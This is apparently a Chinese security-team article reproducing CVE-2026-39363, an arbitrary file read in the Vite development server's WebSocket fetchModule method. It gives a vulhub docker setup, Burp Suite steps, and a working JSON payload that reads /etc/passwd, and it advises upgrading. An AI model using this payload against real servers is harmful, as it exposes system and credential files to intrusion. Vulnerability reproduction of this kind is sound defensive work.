文章总结: 本文复现CVE-2026-39363漏洞,该漏洞影响Vite开发服务器多个版本,攻击者可通过WebSocket的fetchModule方法结合file协议读取服务器任意文件。文章提供完整复现步骤和payload,建议受影响版本及时升级修复。
综合评分: 75
文章分类: 漏洞分析,WEB安全,渗透测试
CVE复现 | CVE-2026-39363漏洞复现
原创
LRT凌日
LRT凌日
凌日网络与信息安全团队LapR1skT
2026年9月21日 08:00
重庆
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
漏洞概述
vite是一个用于JavaScript的前端工具框架,在6.0.0到6.4.2、7.3.2和8.0.5之前的版本中,HTTP的请求路径上强制执行的系统访问控制,并未应用于开发服务器Websocket暴露的fetchModule方法中。攻击者如果可以不带Origin标头的方式连接到vite开发服务器的Websocket,就可以通过自定义vite:invoke来调用fetchModule,并结合file://协议,将服务器上的任意文件读取出来。
受影响的版本
8.0.0 <= vite <= 8.0.4
7.0.0 <= vite <= 7.3.1
6.0.0 <= vite <= 6.4.1
vite-plus <= 0.1.15
环境搭建
切换到docker文件存放的目录下
docker compose up -d 启动容器
漏洞验证
打开http://localhost:5173/进入网页
打开burpsuit对页面进行抓包,并不断放包,直到websocket出现相关请求,之后点击send to repeater。
之后修改发送为发送到服务端,并附上payload
1. `{
3. "type": "custom",
5. "event": "vite:invoke",
7. "data": {
9. "name": "fetchModule",
11. "id": "send:1",
13. "data": ["file:///etc/passwd?raw"]
15. }
17. }`
如截图所示,服务器上的 /etc/passwd 文件内容已经通过开发服务器的 WebSocket 成功读取出来,漏洞利用确认成功。
参考文献
CVE-2026-39363:Vite开发服务器任意文件读取漏洞分析复现 – kivvs – 博客园
(https://www.cnblogs.com/kivvs/articles/22084882/CVE-2026-39363)
https://github.com/vulhub/vulhub/blob/master/vite/CVE-2026-39363/README.zh-cn.md
免责声明:由于传播、利用本公众号凌日网络与信息安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号凌日网络与信息安全团队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
文案|周 宏
排版|孟凡杰
校正|李昕洋
审核|林炳辰
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:凌日网络与信息安全团队LapR1skT LRT凌日
LRT凌日《CVE复现 | CVE-2026-39363漏洞复现》